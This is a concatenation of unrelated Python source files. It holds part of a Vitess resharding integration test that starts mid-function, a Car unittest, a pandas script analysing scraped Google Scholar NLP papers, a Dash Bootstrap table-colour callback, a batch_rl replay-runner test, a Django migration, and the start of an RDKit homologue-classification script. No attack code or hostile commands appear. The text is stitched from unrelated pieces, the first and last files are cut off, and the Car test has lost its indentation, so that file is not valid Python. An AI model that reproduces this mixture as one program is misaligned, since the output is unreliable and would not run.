    s = utils.vtgate.split_query(sql, 'test_keyspace', 4)
    self.assertEqual(len(s), 1)
    self.assertEqual(s[0]['shard_part']['shards'][0], '0')
    # change the schema, backfill keyspace_id, and change schema again
    self._add_sharding_key_to_schema()
    self._backfill_keyspace_id(shard_master)
    self._mark_sharding_key_not_null()
    # now we can be a sharded keyspace (and propagate to SrvKeyspace)
    utils.run_vtctl(['SetKeyspaceShardingInfo', 'test_keyspace',
                     'custom_ksid_col', base_sharding.keyspace_id_type])
    utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'],
                    auto_log=True)
    # run a health check on source replica so it responds to discovery
    utils.run_vtctl(['RunHealthCheck', shard_replica.tablet_alias])
    # create the split shards
    shard_0_master.init_tablet(
        'replica',
        keyspace='test_keyspace',
        shard='-80',
        tablet_index=0)
    shard_0_replica.init_tablet(
        'replica',
        keyspace='test_keyspace',
        shard='-80',
        tablet_index=1)
    shard_0_rdonly1.init_tablet(
        'rdonly',
        keyspace='test_keyspace',
        shard='-80',
        tablet_index=2)
    shard_1_master.init_tablet(
        'replica',
        keyspace='test_keyspace',
        shard='80-',
        tablet_index=0)
    shard_1_replica.init_tablet(
        'replica',
        keyspace='test_keyspace',
        shard='80-',
        tablet_index=1)
    shard_1_rdonly1.init_tablet(
        'rdonly',
        keyspace='test_keyspace',
        shard='80-',
        tablet_index=2)
    for t in [shard_0_master, shard_0_replica, shard_0_rdonly1,
              shard_1_master, shard_1_replica, shard_1_rdonly1]:
      t.create_db('vt_test_keyspace')
      t.start_vttablet(wait_for_state=None,
                       binlog_use_v3_resharding_mode=False)
    for t in [shard_0_master, shard_0_replica, shard_0_rdonly1,
              shard_1_master, shard_1_replica, shard_1_rdonly1]:
      t.wait_for_vttablet_state('NOT_SERVING')
    utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/-80',
                     shard_0_master.tablet_alias], auto_log=True)
    utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/80-',
                     shard_1_master.tablet_alias], auto_log=True)
    for t in [shard_0_replica, shard_1_replica]:
      utils.wait_for_tablet_type(t.tablet_alias, 'replica')
    for t in [shard_0_rdonly1, shard_1_rdonly1]:
      utils.wait_for_tablet_type(t.tablet_alias, 'rdonly')
    sharded_tablets = [shard_0_master, shard_0_replica, shard_0_rdonly1,
                       shard_1_master, shard_1_replica, shard_1_rdonly1]
    for t in sharded_tablets:
      t.wait_for_vttablet_state('SERVING')
    # must restart vtgate after tablets are up, or else wait until 1min refresh
    # we want cache_ttl at zero so we re-read the topology for every test query.
    utils.vtgate.kill()
    utils.vtgate = None
    utils.VtGate().start(cache_ttl='0', tablets=[
        shard_master, shard_replica, shard_rdonly1,
        shard_0_master, shard_0_replica, shard_0_rdonly1,
        shard_1_master, shard_1_replica, shard_1_rdonly1])
    var = None
    # Wait for the endpoints, either local or remote.
    utils.vtgate.wait_for_endpoints('test_keyspace.0.master', 1, var=var)
    utils.vtgate.wait_for_endpoints('test_keyspace.0.replica', 1, var=var)
    utils.vtgate.wait_for_endpoints('test_keyspace.0.rdonly', 1, var=var)
    utils.vtgate.wait_for_endpoints('test_keyspace.-80.master', 1, var=var)
    utils.vtgate.wait_for_endpoints('test_keyspace.-80.replica', 1, var=var)
    utils.vtgate.wait_for_endpoints('test_keyspace.-80.rdonly', 1, var=var)
    utils.vtgate.wait_for_endpoints('test_keyspace.80-.master', 1, var=var)
    utils.vtgate.wait_for_endpoints('test_keyspace.80-.replica', 1, var=var)
    utils.vtgate.wait_for_endpoints('test_keyspace.80-.rdonly', 1, var=var)
    # check the Map Reduce API works correctly, should use ExecuteKeyRanges now,
    # as we are sharded (with just one shard).
    # again, we have 3 values in the database, asking for 4 splits will get us
    # a single query.
    sql = 'select id, msg from resharding1'
    s = utils.vtgate.split_query(sql, 'test_keyspace', 4)
    self.assertEqual(len(s), 1)
    self.assertEqual(s[0]['key_range_part']['keyspace'], 'test_keyspace')
    # There must be one empty KeyRange which represents the full keyspace.
    self.assertEqual(len(s[0]['key_range_part']['key_ranges']), 1)
    self.assertEqual(s[0]['key_range_part']['key_ranges'][0], {})
    utils.check_srv_keyspace('test_nj', 'test_keyspace',
                             'Partitions(master): -\n'
                             'Partitions(rdonly): -\n'
                             'Partitions(replica): -\n',
                             keyspace_id_type=base_sharding.keyspace_id_type,
                             sharding_column_name='custom_ksid_col')
    # we need to create the schema, and the worker will do data copying
    for keyspace_shard in ('test_keyspace/-80', 'test_keyspace/80-'):
      utils.run_vtctl(['CopySchemaShard',
                       '--exclude_tables', 'unrelated',
                       shard_rdonly1.tablet_alias,
                       keyspace_shard],
                      auto_log=True)
    utils.run_vtctl(['RunHealthCheck', shard_rdonly1.tablet_alias])
    # Run vtworker as daemon for the following SplitClone commands.
    worker_proc, worker_port, worker_rpc_port = utils.run_vtworker_bg(
        ['--cell', 'test_nj', '--command_display_interval', '10ms',
         '--use_v3_resharding_mode=false'],
        auto_log=True)
    # Initial clone (online).
    workerclient_proc = utils.run_vtworker_client_bg(
        ['SplitClone',
         '--offline=false',
         '--exclude_tables', 'unrelated',
         '--chunk_count', '10',
         '--min_rows_per_chunk', '1',
         '--min_healthy_rdonly_tablets', '1',
         'test_keyspace/0'],
        worker_rpc_port)
    utils.wait_procs([workerclient_proc])
    self.verify_reconciliation_counters(worker_port, 'Online', 'resharding1',
                                        3, 0, 0, 0)
    # Reset vtworker such that we can run the next command.
    workerclient_proc = utils.run_vtworker_client_bg(['Reset'], worker_rpc_port)
    utils.wait_procs([workerclient_proc])
    # Modify the destination shard. SplitClone will revert the changes.
    # Delete row 1 (provokes an insert).
    shard_0_master.mquery('vt_test_keyspace',
                          'delete from resharding1 where id=1', write=True)
    # Delete row 2 (provokes an insert).
    shard_1_master.mquery('vt_test_keyspace',
                          'delete from resharding1 where id=2', write=True)
    # Update row 3 (provokes an update).
    shard_1_master.mquery('vt_test_keyspace',
                          "update resharding1 set msg='msg-not-3' where id=3",
                          write=True)
    # Insert row 4 (provokes a delete).
    self._insert_value(shard_1_master, 'resharding1', 4, 'msg4',
                       0xD000000000000000)
    workerclient_proc = utils.run_vtworker_client_bg(
        ['SplitClone',
         '--exclude_tables', 'unrelated',
         '--chunk_count', '10',
         '--min_rows_per_chunk', '1',
         '--min_healthy_rdonly_tablets', '1',
         'test_keyspace/0'],
        worker_rpc_port)
    utils.wait_procs([workerclient_proc])
    self.verify_reconciliation_counters(worker_port, 'Online', 'resharding1',
                                        2, 1, 1, 0)
    self.verify_reconciliation_counters(worker_port, 'Offline', 'resharding1',
                                        0, 0, 0, 3)
    # Terminate worker daemon because it is no longer needed.
    utils.kill_sub_process(worker_proc, soft=True)
    # check the startup values are in the right place
    self._check_startup_values()
    # check the schema too
    utils.run_vtctl(['ValidateSchemaKeyspace', 'test_keyspace'], auto_log=True)
    # check the binlog players are running
    logging.debug('Waiting for binlog players to start on new masters...')
    self.check_destination_master(shard_0_master, ['test_keyspace/0'])
    self.check_destination_master(shard_1_master, ['test_keyspace/0'])
    # check that binlog server exported the stats vars
    self.check_binlog_server_vars(shard_replica, horizontal=True)
    # testing filtered replication: insert a bunch of data on shard 1,
    # check we get most of it after a few seconds, wait for binlog server
    # timeout, check we get all of it.
    logging.debug('Inserting lots of data on source shard')
    self._insert_lots(1000)
    logging.debug('Checking 80 percent of data is sent quickly')
    v = self._check_lots_timeout(1000, 80, 5)
    if v != 100:
      logging.debug('Checking all data goes through eventually')
      self._check_lots_timeout(1000, 100, 20)
    logging.debug('Checking no data was sent the wrong way')
    self._check_lots_not_present(1000)
    self.check_binlog_player_vars(shard_0_master, ['test_keyspace/0'],
                                  seconds_behind_master_max=30)
    self.check_binlog_player_vars(shard_1_master, ['test_keyspace/0'],
                                  seconds_behind_master_max=30)
    self.check_binlog_server_vars(shard_replica, horizontal=True,
                                  min_statements=1000, min_transactions=1000)
    # use vtworker to compare the data
    for t in [shard_0_rdonly1, shard_1_rdonly1]:
      utils.run_vtctl(['RunHealthCheck', t.tablet_alias])
    if base_sharding.use_multi_split_diff:
      logging.debug('Running vtworker MultiSplitDiff for 0')
      utils.run_vtworker(['-cell', 'test_nj',
                          '--use_v3_resharding_mode=false',
                          'MultiSplitDiff',
                          '--min_healthy_rdonly_tablets', '1',
                          'test_keyspace/0'],
                         auto_log=True)
    else:
      logging.debug('Running vtworker SplitDiff for -80')
      utils.run_vtworker(['-cell', 'test_nj',
                          '--use_v3_resharding_mode=false',
                          'SplitDiff',
                          '--min_healthy_rdonly_tablets', '1',
                          'test_keyspace/-80'],
                         auto_log=True)
      logging.debug('Running vtworker SplitDiff for 80-')
      utils.run_vtworker(['-cell', 'test_nj',
                          '--use_v3_resharding_mode=false',
                          'SplitDiff',
                          '--min_healthy_rdonly_tablets', '1',
                          'test_keyspace/80-'],
                         auto_log=True)
    utils.pause('Good time to test vtworker for diffs')
    # get status for the destination master tablet, make sure we have it all
    self.check_running_binlog_player(shard_0_master, 2000, 2000)
    self.check_running_binlog_player(shard_1_master, 6000, 2000)
    # check we can't migrate the master just yet
    utils.run_vtctl(['MigrateServedTypes', 'test_keyspace/0', 'master'],
                    expect_fail=True)
    # now serve rdonly from the split shards
    utils.run_vtctl(['MigrateServedTypes', 'test_keyspace/0', 'rdonly'],
                    auto_log=True)
    utils.check_srv_keyspace('test_nj', 'test_keyspace',
                             'Partitions(master): -\n'
                             'Partitions(rdonly): -80 80-\n'
                             'Partitions(replica): -\n',
                             keyspace_id_type=base_sharding.keyspace_id_type,
                             sharding_column_name='custom_ksid_col')
    # make sure rdonly tablets are back to serving before hitting vtgate.
    for t in [shard_0_rdonly1, shard_1_rdonly1]:
      t.wait_for_vttablet_state('SERVING')
    utils.vtgate.wait_for_endpoints('test_keyspace.-80.rdonly', 1)
    utils.vtgate.wait_for_endpoints('test_keyspace.80-.rdonly', 1)
    # check the Map Reduce API works correctly, should use ExecuteKeyRanges
    # on both destination shards now.
    # we ask for 2 splits to only have one per shard
    sql = 'select id, msg from resharding1'
    timeout = 10.0
    while True:
      try:
        s = utils.vtgate.split_query(sql, 'test_keyspace', 2)
        break
      except Exception:  # pylint: disable=broad-except
        timeout = utils.wait_step(
            'vtgate executes split_query properly', timeout)
    self.assertEqual(len(s), 2)
    self.assertEqual(s[0]['key_range_part']['keyspace'], 'test_keyspace')
    self.assertEqual(s[1]['key_range_part']['keyspace'], 'test_keyspace')
    self.assertEqual(len(s[0]['key_range_part']['key_ranges']), 1)
    self.assertEqual(len(s[1]['key_range_part']['key_ranges']), 1)
    # then serve replica from the split shards
    source_tablet = shard_replica
    destination_tablets = [shard_0_replica, shard_1_replica]
    utils.run_vtctl(
        ['MigrateServedTypes', 'test_keyspace/0', 'replica'], auto_log=True)
    utils.check_srv_keyspace('test_nj', 'test_keyspace',
                             'Partitions(master): -\n'
                             'Partitions(rdonly): -80 80-\n'
                             'Partitions(replica): -80 80-\n',
                             keyspace_id_type=base_sharding.keyspace_id_type,
                             sharding_column_name='custom_ksid_col')
    # move replica back and forth
    utils.run_vtctl(
        ['MigrateServedTypes', '-reverse', 'test_keyspace/0', 'replica'],
        auto_log=True)
    # After a backwards migration, queryservice should be enabled on
    # source and disabled on destinations
    utils.check_tablet_query_service(self, source_tablet, True, False)
    utils.check_tablet_query_services(self, destination_tablets, False, True)
    utils.check_srv_keyspace('test_nj', 'test_keyspace',
                             'Partitions(master): -\n'
                             'Partitions(rdonly): -80 80-\n'
                             'Partitions(replica): -\n',
                             keyspace_id_type=base_sharding.keyspace_id_type,
                             sharding_column_name='custom_ksid_col')
    utils.run_vtctl(['MigrateServedTypes', 'test_keyspace/0', 'replica'],
                    auto_log=True)
    # After a forwards migration, queryservice should be disabled on
    # source and enabled on destinations
    utils.check_tablet_query_service(self, source_tablet, False, True)
    utils.check_tablet_query_services(self, destination_tablets, True, False)
    utils.check_srv_keyspace('test_nj', 'test_keyspace',
                             'Partitions(master): -\n'
                             'Partitions(rdonly): -80 80-\n'
                             'Partitions(replica): -80 80-\n',
                             keyspace_id_type=base_sharding.keyspace_id_type,
                             sharding_column_name='custom_ksid_col')
    # then serve master from the split shards
    utils.run_vtctl(['MigrateServedTypes', 'test_keyspace/0', 'master'],
                    auto_log=True)
    utils.check_srv_keyspace('test_nj', 'test_keyspace',
                             'Partitions(master): -80 80-\n'
                             'Partitions(rdonly): -80 80-\n'
                             'Partitions(replica): -80 80-\n',
                             keyspace_id_type=base_sharding.keyspace_id_type,
                             sharding_column_name='custom_ksid_col')
    # check the binlog players are gone now
    self.check_no_binlog_player(shard_0_master)
    self.check_no_binlog_player(shard_1_master)
    # make sure we can't delete a shard with tablets
    utils.run_vtctl(['DeleteShard', 'test_keyspace/0'], expect_fail=True)
    # remove the original tablets in the original shard
    tablet.kill_tablets([shard_master, shard_replica, shard_rdonly1])
    for t in [shard_replica, shard_rdonly1]:
      utils.run_vtctl(['DeleteTablet', t.tablet_alias], auto_log=True)
    utils.run_vtctl(['DeleteTablet', '-allow_master',
                     shard_master.tablet_alias], auto_log=True)
    # rebuild the serving graph, all mentions of the old shards shoud be gone
    utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'], auto_log=True)
    # delete the original shard
    utils.run_vtctl(['DeleteShard', 'test_keyspace/0'], auto_log=True)
    # kill everything else
    tablet.kill_tablets([shard_0_master, shard_0_replica, shard_0_rdonly1,
                         shard_1_master, shard_1_replica, shard_1_rdonly1])
# utils.main() handles the shared test-harness flags before running unittest.
if __name__ == '__main__':
  utils.main()
|
import unittest
from logic.car import Car
class TestCar(unittest.TestCase):
def setUp(self):
self.car_obj = Car()
def test_reg_no(self):
self.car_obj.reg_no = "1234"
self.assertEqual(self.car_obj.reg_no, "1234")
def test_colour(self):
self.car_obj.colour = "red"
self.assertEqual(self.car_obj.colour, "red")
if __name__ == '__main__':
    # Run the TestCar suite when executed as a script.
    unittest.main()
|
# %%
# Load libraries
import pandas as pd
import numpy as np
from bs4 import BeautifulSoup
import os
import re
import seaborn as sns
import matplotlib.pyplot as plt
# %%
# set plot styles
sns.set_style("darkgrid")  # seaborn theme applied globally to every figure below
# %%
def load_docs(dir_path):
    """Load the text of every ``.html`` file found in a directory.

    - Parameters: dir_path (string) for a directory containing text files.
    - Returns: A list of dictionaries with keys file_name and text.
    """
    docs = []
    for file_name in os.listdir(dir_path):
        file_path = os.path.join(dir_path, file_name)
        # Only regular files with an .html extension are loaded.
        if file_name.endswith(".html") and os.path.isfile(file_path):
            # Fix: open read-only. The previous "r+" mode needlessly
            # required write permission on the files even though they
            # are only ever read, and failed on read-only data.
            with open(file_path, "r", encoding="utf-8") as file:
                docs.append({
                    "file_name": file_name,
                    "text": file.read(),
                })
    return docs
# Load the raw Google Scholar result pages from ./data; sort by file name
# so repeated runs process the pages in a deterministic order.
html_docs = load_docs("data")
html_docs = sorted(html_docs, key=lambda d: d["file_name"])
# %%
def extract_paper_data(paper):
    """
    - Parameters: paper (BeautifulSoup object for a single "gs_ri" result div)
    - Returns: A dictionary of paper attributes.
    """
    title_anchor = paper.find("h3").find("a")
    # The "gs_a" line holds "authors - venue, year - site"; authors precede
    # the first dash.
    author_info = paper.find(class_="gs_a")
    authors = author_info.text.split("-")[0].strip().split(", ")
    # Take the last space-prefixed 4-digit group as the publication year.
    year = "".join(re.findall(r' \d{4}', author_info.text))[-4:]
    blurb = paper.find(class_="gs_rs")
    usage_data = paper.find(class_="gs_fl")
    # NOTE(review): assumes the third anchor in "gs_fl" is always the
    # "Cited by N" link — confirm against the scraped page layout.
    citation_anchor = usage_data.find_all("a")[2]
    # NOTE(review): int("".join(...)) raises ValueError when the anchor text
    # contains no digits (e.g. an uncited paper) — verify this never happens.
    num_cites = int("".join(re.findall(r'\d*', citation_anchor.text)))
    return {
        "title": title_anchor.text if title_anchor else "",
        "authors": authors,
        "blurb": blurb.text if blurb else "",
        "citations": num_cites,
        "year": int(year) if year != "" else "",
        "link": title_anchor["href"] if title_anchor else ""
    }
def paper_df(paper_html):
    """
    - Parameters: paper_html (string of html text from a Google Scholar page)
    - Returns: A Pandas DataFrame with data for each paper in paper_html
    """
    soup = BeautifulSoup(paper_html, "html.parser")
    # Each result entry lives in a "gs_ri" div inside the results container.
    listing = soup.find(id="gs_res_ccl_mid").find_all("div", class_="gs_ri")
    return pd.DataFrame([extract_paper_data(entry) for entry in listing])
def load_papers(html_docs):
    """
    - Parameters: html_docs (a list of dictionaries with file_name and text keys)
    - Returns: A Pandas DataFrame with data from each of the papers in html_docs
    """
    frames = [paper_df(doc["text"]) for doc in html_docs]
    # Combine all pages and rank by citation count, most-cited first.
    combined = pd.concat(frames).sort_values("citations", ascending=False)
    return combined.reset_index(drop=True)
def clean_papers(papers_df):
    """
    - Parameters: papers_df (Pandas DataFrame)
    - Returns: A dataframe with rows that contain empty cells removed.
    """
    # Empty strings are mapped to NaN first so dropna() removes those rows too.
    cleaned = papers_df.copy().replace("", np.nan, regex=True)
    return cleaned.dropna()
# Parse every page into one DataFrame, then drop rows with missing fields.
papers = load_papers(html_docs)
papers = clean_papers(papers)
# %%
# add citation_rate column
def get_citation_rate(citations, year_published):
    """
    - Parameters: citations (int or Series), year_published (int or Series)
    - Returns: The number of citations per year, since the year published.
    """
    # Fix: pd.datetime was deprecated in pandas 0.25 and removed in later
    # releases; pd.Timestamp.now() is the supported equivalent and needs
    # no extra import.
    current_year = pd.Timestamp.now().year
    years_since_publish = current_year - year_published
    # +1 so papers published in the current year do not divide by zero.
    return citations / (years_since_publish + 1)
# Derive citations-per-year and reorder columns for readability.
papers["citation_rate"] = get_citation_rate(papers["citations"], papers["year"])
papers = papers[["title", "authors", "blurb", "citations",
                 "citation_rate", "year", "link"]]
papers.head(10)
# %%
# prolific authors
def get_author_counts(papers_df):
    """
    - Parameters: papers_df (Pandas DataFrame) with an "authors" column of lists.
    - Returns: A dataframe with a count of each author in pandas_df["authors"],
      sorted by descending count, then alphabetically by author.
    """
    # One row per (paper, author) pair; stack() drops the padding NaNs that
    # apply(pd.Series) introduces for papers with fewer authors.
    flattened = papers_df["authors"].apply(pd.Series).stack()
    author_series = flattened.reset_index(name="author")["author"]
    tallies = author_series.value_counts()
    tallies = tallies.rename_axis("author").reset_index(name="count")
    return tallies.sort_values(by=["count", "author"],
                               ascending=[False, True])
# Tally paper appearances per author and preview the ten most prolific.
author_counts = get_author_counts(papers)
author_counts.head(10)
# %%
def filter_by_author(papers_df, author_name):
    """
    - Parameters: papers_df (Pandas DataFrame), author_name (str)
    - Returns: A dataframe with entries from papers_df by author.
    """
    # Membership test against each paper's author list.
    mask = papers_df["authors"].apply(lambda author_list: author_name in author_list)
    return papers_df[mask]
# Example lookup: all collected papers co-authored by C Friedman.
filter_by_author(papers, "C Friedman")
# %%
def get_author_citation_counts(papers_df):
    """
    - Parameters: papers_df (Pandas DataFrame)
    - Returns: A dataframe with a citation count for each author.
    """
    # One row per (paper, author) pair, keeping only the numeric columns,
    # then total citations and citation_rate per author.
    per_author = papers_df.explode("authors")[["authors", "citations", "citation_rate"]]
    totals = per_author.groupby("authors").sum()
    return totals.reset_index()
# Aggregate citations per author and preview the first ten rows.
author_citation_counts = get_author_citation_counts(papers)
author_citation_counts.head(10)
# %%
# plot top authors
def plot_counts(df, title, subtitle, x_col, x_lab, y_col="count", y_lab="Count"):
    """
    - Parameters df (Pandas DataFrame), title (str), subtitle (str), x_col (str),
      x_lab (str), y_col (str), y_lab (str)
    - Plots a barplot of df using the provided x and y columns.
    """
    fig, axis = plt.subplots(figsize=(7, 5))
    sns.barplot(x=x_col, y=y_col, data=df, alpha=0.9, ax=axis)
    axis.set(xlabel=x_lab, ylabel=y_lab)
    # Two-line heading drawn in axes coordinates above the plot area.
    for y_pos, text, size in ((1.15, title, 16), (1.05, subtitle, 14)):
        axis.text(x=0.5, y=y_pos, s=text, fontsize=size, ha="center",
                  va="bottom", transform=axis.transAxes)
    plt.xticks(rotation=90)
    plt.show()
# Shared figure title reused by the later plots; plot the ten most prolific authors.
title = "Influential NLP Papers on Google Scholar"
subtitle = "Most Prolific Authors"
plot_counts(author_counts.head(10), title, subtitle, "author", "Author")
# %%
# citations by year
def get_yearly_citation_count(papers_df):
    """
    - Parameters: papers_df (Pandas DataFrame)
    - Returns: A dataframe with a count of citations per year
    """
    yearly = papers_df.groupby("year").sum().reset_index()
    # Recompute the rate from yearly totals; per-paper rates do not sum
    # to the correct aggregate value.
    yearly["citation_rate"] = get_citation_rate(yearly["citations"], yearly["year"])
    return yearly
# Aggregate citation totals per publication year for the plots below.
yearly_citations = get_yearly_citation_count(papers)
# %%
# plot yearly citations
def plot_citations_by_year(df, title, subtitle, year_col="year"):
    """
    - Parameters df (Pandas DataFrame), title (str), subtitle (str), year_col (str)
    - Plots a scatterplot of the count of citations and citation_rate in df by year.
    """
    # NOTE(review): the scatterplots always read the literal "year" column;
    # the year_col parameter is currently unused — confirm intent.
    fig, axes = plt.subplots(figsize=(7, 11), nrows=2, ncols=1)
    panels = (
        ("citations", "navy", "Total citations", "Total citations, per year"),
        ("citation_rate", "teal", "Citations per year", "Citation rate, by year"),
    )
    for axis, (column, colour, y_label, panel_title) in zip(axes, panels):
        sns.scatterplot(x="year", y=column, data=df, alpha=0.7,
                        color=colour, ax=axis)
        axis.set(xlabel="Year", ylabel=y_label, title=panel_title)
    # Figure-level heading drawn above the first panel.
    for y_pos, text, size in ((1.20, title, 16), (1.10, subtitle, 14)):
        axes[0].text(x=0.5, y=y_pos, s=text, fontsize=size, ha="center",
                     va="bottom", transform=axes[0].transAxes)
    plt.show()
# Plot per-paper citations and citation rates against publication year.
subtitle = "Citations and Citation Rate by Year"
plot_citations_by_year(papers, title, subtitle)
# %%
# top papers by citation
def top_papers_by_col(papers_df, sort_col, limit=10):
    """
    - Parameters: papers_df (Pandas DataFrame), sort_col (str), limit (int)
    - Returns: A dataframe with [limit] entries based on the highest values for
      sort_col in papers_df.
    """
    ranked = papers_df.copy().sort_values(by=sort_col, ascending=False)
    return ranked.head(limit)
# Most cited papers overall.
top_papers_by_col(papers, "citations")
# %%
# top papers by citation_rate
top_papers_by_col(papers, "citation_rate")
# %%
# up-and-coming papers
def filter_by_year(df, filter_year, year_col="year"):
    """
    - Parameters: df (Pandas DataFrame), filter_year (int), year_col (str)
    - Returns: A dataframe where year_col in df is filtered by year.
    """
    mask = df[year_col] == filter_year
    return df[mask]
# Most cited papers published in 2020 only.
top_papers_by_col(filter_by_year(papers, 2020), "citations")
# %%
# plot papers by year
def plot_count_by_year(df, title, subtitle, year_col="year"):
    """
    - Parameters df (Pandas DataFrame), title (str), subtitle (str), year_col (str)
    - Plots a scatterplot of the count of rows in df, grouped by year_col.
    """
    per_year = df.groupby(year_col).size().reset_index(name="count")
    fig, axis = plt.subplots(figsize=(7, 5))
    # NOTE(review): x is the literal "year" column even though the grouping
    # used year_col — matches original behavior; confirm intent.
    sns.scatterplot(x="year", y="count", data=per_year, alpha=0.8, ax=axis)
    axis.set(xlabel="Year", ylabel="Count")
    # Two-line heading drawn in axes coordinates above the plot area.
    for y_pos, text, size in ((1.15, title, 16), (1.05, subtitle, 14)):
        axis.text(x=0.5, y=y_pos, s=text, fontsize=size, ha="center",
                  va="bottom", transform=axis.transAxes)
    plt.xticks(rotation=90)
    plt.show()
# Number of collected papers per publication year.
subtitle = "Papers by Year"
plot_count_by_year(papers, title, subtitle)
|
import dash_bootstrap_components as dbc
from dash import Input, Output, html
# Dropdown of the eight Bootstrap contextual colours; its value drives the
# table's `color` prop via the callback below.
color_selector = html.Div(
    [
        html.Div("Select a colour theme:"),
        dbc.Select(
            id="change-table-color",
            options=[
                {"label": "primary", "value": "primary"},
                {"label": "secondary", "value": "secondary"},
                {"label": "success", "value": "success"},
                {"label": "danger", "value": "danger"},
                {"label": "warning", "value": "warning"},
                {"label": "info", "value": "info"},
                {"label": "light", "value": "light"},
                {"label": "dark", "value": "dark"},
            ],
            value="primary",  # initial theme shown before any selection
        ),
    ],
    className="p-3 m-2 border",
)
# NOTE(review): table_header and table_body are defined elsewhere in this
# file (referenced by the comment below) — confirm they are in scope here.
table = html.Div(
    [
        color_selector,
        dbc.Table(
            # using the same table as in the above example
            table_header + table_body,
            id="table-color",
            color="primary",  # must match the selector's initial value
        ),
    ]
)
@app.callback(
    Output("table-color", "color"), Input("change-table-color", "value")
)
def change_table_colour(color):
    """Forward the dropdown's selected theme name straight to the table."""
    return color
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""End to end tests for FixedReplayRunner."""
import datetime
import os
import shutil
from absl import flags
from batch_rl.fixed_replay import train
import tensorflow.compat.v1 as tf
FLAGS = flags.FLAGS
class FixedReplayRunnerIntegrationTest(tf.test.TestCase):
  """Tests for Atari environment with various agents.
  """

  def setUp(self):
    """Point the runner at a unique timestamped scratch directory."""
    super(FixedReplayRunnerIntegrationTest, self).setUp()
    FLAGS.base_dir = os.path.join(
        '/tmp/batch_rl_tests',
        datetime.datetime.utcnow().strftime('run_%Y_%m_%d_%H_%M_%S'))
    self._checkpoint_dir = os.path.join(FLAGS.base_dir, 'checkpoints')
    self._logging_dir = os.path.join(FLAGS.base_dir, 'logs')

  def quickFixedReplayREMFlags(self):
    """Assign flags for a quick run of FixedReplay agent."""
    # Gin overrides shrink the run to one tiny iteration so the end-to-end
    # test finishes quickly.
    FLAGS.gin_bindings = [
        "create_runner.schedule='continuous_train_and_eval'",
        'FixedReplayRunner.training_steps=100',
        'FixedReplayRunner.evaluation_steps=10',
        'FixedReplayRunner.num_iterations=1',
        'FixedReplayRunner.max_steps_per_episode=100',
    ]
    FLAGS.alsologtostderr = True
    FLAGS.gin_files = ['batch_rl/fixed_replay/configs/rem.gin']
    FLAGS.agent_name = 'multi_head_dqn'

  def verifyFilesCreated(self, base_dir):
    """Verify that files have been created."""
    # Check checkpoint files
    self.assertTrue(
        os.path.exists(os.path.join(self._checkpoint_dir, 'ckpt.0')))
    self.assertTrue(
        os.path.exists(os.path.join(self._checkpoint_dir, 'checkpoint')))
    self.assertTrue(
        os.path.exists(
            os.path.join(self._checkpoint_dir,
                         'sentinel_checkpoint_complete.0')))
    # Check log files
    self.assertTrue(os.path.exists(os.path.join(self._logging_dir, 'log_0')))

  def testIntegrationFixedReplayREM(self):
    """Test the FixedReplayMultiHeadDQN agent."""
    # --replay_dir must be supplied on the command line; the test trains
    # from a pre-recorded replay buffer.
    assert FLAGS.replay_dir is not None, 'Please provide a replay directory'
    tf.logging.info('####### Training the REM agent #####')
    tf.logging.info('####### REM base_dir: {}'.format(FLAGS.base_dir))
    tf.logging.info('####### replay_dir: {}'.format(FLAGS.replay_dir))
    self.quickFixedReplayREMFlags()
    train.main([])
    self.verifyFilesCreated(FLAGS.base_dir)
    shutil.rmtree(FLAGS.base_dir)  # clean up the scratch dir on success
if __name__ == '__main__':
  # Delegate to the TF test runner (parses absl flags, runs the TestCase).
  tf.test.main()
|
# Generated by Django 3.1.7 on 2021-02-25 09:18
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add image and label fields to the home app's Item model."""

    dependencies = [
        ('home', '0001_initial'),
    ]

    operations = [
        # Optional free-text image reference (blank allowed in forms).
        migrations.AddField(
            model_name='item',
            name='image',
            field=models.TextField(blank=True),
        ),
        # Closed set of product labels; existing rows default to 'new'.
        migrations.AddField(
            model_name='item',
            name='label',
            field=models.CharField(choices=[('new', 'New Product'), ('hot', 'Hot Product'), ('sale', 'Sale Product')], default='new', max_length=60),
        ),
    ]
|
print("Starting up...")
# import necessary libraries
from time import time
start = time()  # wall-clock start, reported in the summary at the end
import os
import argparse
import rdkit.Chem as Chem
from utils import *
from rdkit.Chem import AllChem
from pathlib import Path
import rdkit.Chem.rdchem as rdchem
import rdkit.Chem.Draw as Draw
import rdkit.Chem.Descriptors
from rdkit.Chem import PandasTools
from rdkit.Chem.Draw import MolsToGridImage
import pandas as pd
import numpy as np
import datamol as dm
print("Homologue classification started...")
# parse command line inputs
parser = argparse.ArgumentParser()
parser.add_argument("-in", "--input_csv", help="CSV containing SMILES and Name.")
parser.add_argument("-sep", "--separator", help="Delimiter for CSV file.")
parser.add_argument("-s", "--smiles", help="Name of column containing SMILES.", type=str)
parser.add_argument("-n", "--names", help="Name of column containing Names.", type=str)
parser.add_argument(
    "-ru",
    "--repeatingunits",
    help="Repeating unit as SMARTS string enclosed by speech marks. Default is CH2 i.e., [#6&H2].",
    type=str,
)
parser.add_argument(
    "-min",
    "--min_RU_in",
    help="Minimum length of RU chain, default = 3 units.",
    type=int,
)
parser.add_argument(
    "-max",
    "--max_RU_in",
    help="Maximum length of RU chain, default = 30 units.",
    type=int,
)
parser.add_argument(
    "-f",
    "--frag_in",
    help="No. of fragmentation steps separating RU from core(s).",
    type=int,
)
args = parser.parse_args()
# Resolve CLI arguments, falling back to defaults only when a flag was
# omitted. Fix: compare against None instead of truthiness so explicit
# but falsy values (e.g. "-f 0" or an empty string) are no longer
# silently replaced by the defaults.
smiles = args.smiles if args.smiles is not None else "SMILES"  # default SMILES column name
names = args.names if args.names is not None else "Name"  # default Name column name
# RU SMARTS gets a trailing "-" bond; default repeating unit is CH2.
ru_in = args.repeatingunits + "-" if args.repeatingunits is not None else "[#6&H2]-"
min_length = args.min_RU_in if args.min_RU_in is not None else 3  # min RU chain length
max_length = args.max_RU_in if args.max_RU_in is not None else 30  # max RU chain length
